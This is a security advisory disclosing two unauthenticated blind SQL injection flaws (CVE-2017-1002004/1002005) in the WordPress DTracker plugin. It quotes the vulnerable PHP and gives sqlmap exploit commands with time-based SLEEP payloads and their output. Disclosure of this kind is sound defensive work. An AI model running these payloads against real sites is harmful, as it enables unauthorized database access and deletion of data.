Advisory #: 183 |
Title: Multiple Blind SQL injection vulnerability in Wordpress Plugin DTracker v1.5 |
Author: Larry W. Cashdollar, @_larry0 |
Date: 2017-03-08 |
CVE-ID:[CVE-2017-1002004][CVE-2017-1002005] |
CWE: CWE-89 SQL Injection |
Download Site: https://wordpress.org/plugins/dtracker/ |
Vendor: https://profiles.wordpress.org/dijo/ |
Vendor Notified: 2017-03-08 |
Vendor Contact: plugins@wordpress.org |
Advisory: http://www.vapidlabs.com/advisory.php?v=183 |
Description: Track the details of the users downloading the pdf files from wordpress site. |
Vulnerability: CVE-2017-1002004:
In file ./dtracker/download.php user input isn't sanitized via the id variable before adding it to the end of an SQL query.
$doc_id = $_GET['id'];
$file = $wpdb->get_results( "SELECT * FROM wp_posts WHERE ID = $doc_id " );
The user does not need to be authenticated to the Wordpress installation to exploit this vulnerability.
CVE-2017-1002005:
In file ./dtracker/delete.php user input isn't sanitized via the contact_id variable before adding it to the end of an SQL query.
$contact_id = $_POST['contact_id']; //Contact ID to be deleted
$query = "DELETE FROM wp_contacts WHERE id = $contact_id";
$wpdb->query($query); // Delete the contact
The user does not need to be authenticated to the Wordpress installation to exploit this vulnerability.
|
Export: JSON TEXT XML |
Exploit Code:$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/download.php?id=*' --dbms mysql --level 3 --risk 3URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 1410 HTTP(s) requests: --- Parameter: #1* (URI) Type: AND/OR time-based blind Title : MySQL >= 5 .0 .12 time -based blind - Parameter replace Payload: http://192.168.0.169:80/wordpress/wp-content/plugins/dtracker/download.php?id=(CASE WHEN (7148=7148) THEN SLEEP(5) ELSE 7148 END) --- [10:14:09] [INFO ] the back -end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 (xenial )web application technology: Apache 2.4.18 [10:14:09] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 14 times [10:14:09] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' $ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/delete.php' --data 'contact_id=*' --dbms mysql --risk 1 --level 3 (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 831 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title : MySQL >= 5 .0 .12 time -based blind - Parameter replace (substraction ) Payload : contact_id =(SELECT * FROM (SELECT (SLEEP(5)))Vtrh )--- [11:53:27] [INFO ] the back -end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 (xenial )web application technology: Apache 2.4.18 [11:53:27] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
|
Screen Shots: |
Notes: |